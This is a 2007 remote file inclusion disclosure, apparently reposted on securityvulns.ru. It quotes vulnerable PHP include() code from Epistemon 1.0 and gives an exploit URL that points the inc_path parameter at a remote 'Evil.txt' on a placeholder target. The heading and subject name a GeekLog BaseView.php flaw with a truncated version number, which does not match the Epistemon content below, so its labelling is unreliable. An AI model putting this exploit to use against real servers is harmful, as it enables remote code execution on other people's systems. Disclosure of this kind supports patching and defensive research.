Security Advisory: GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  SMA-DB <= 0.3.9 (settings.
php) Remote File Inclusion Vulnerability
  WebBuilder <= 2.0 Remote File Include Vulnerability
  GeekLog <= 2. (BaseView.
php) Remote File Include Vulnerabilities
  GeekLog <= 2. (BaseView.
php) Remote File Include Vulnerabilities

From: GolD_M <hacker__(at)_w.cn>
Date: 07.02.2007
Subject: GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Epistemon 1.0 <= Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_@W.Cn

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

URL:

http://sourcesup.cru.fr/frs/download.php/668/Epistemon_V1.tgz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

V.CODE: In : /plateforme/code/inc/common.inc.php

include($inc_path.'config.php');
include ($inc_path."i18n.inc.php");
include ($inc_path."const.inc.php")      ;
include ($inc_path."c_init.inc".$ext)     ;
include ($inc_path."c_chapitre.inc".$ext) ;
include ($inc_path."c_color.inc".$ext)    ;

include ($inc_path."c_connexion.inc".$ext);
include ($inc_path."c_file.inc".$ext)     ;
include ($inc_path."c_formation.inc".$ext);
include ($inc_path."c_groupe.inc".$ext)   ;
include ($inc_path."c_header.inc".$ext)   ;
include ($inc_path."c_mail.inc".$ext)     ;
include ($inc_path."c_membre.inc".$ext)   ;
include ($inc_path."c_webmail.inc".$ext) ;
include ($inc_path."c_module.inc".$ext)   ;
include ($inc_path."c_mysql.inc".$ext)    ;
include ($inc_path."c_phorum.inc".$ext)   ;
include ($inc_path."c_tuteur.inc".$ext)   ;
include ($inc_path."c_document.inc".$ext) ;
include ($inc_path."html.inc".$ext)       ;
include ($inc_path."c_complement.inc".$ext);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Exploit:

http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.
txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

test server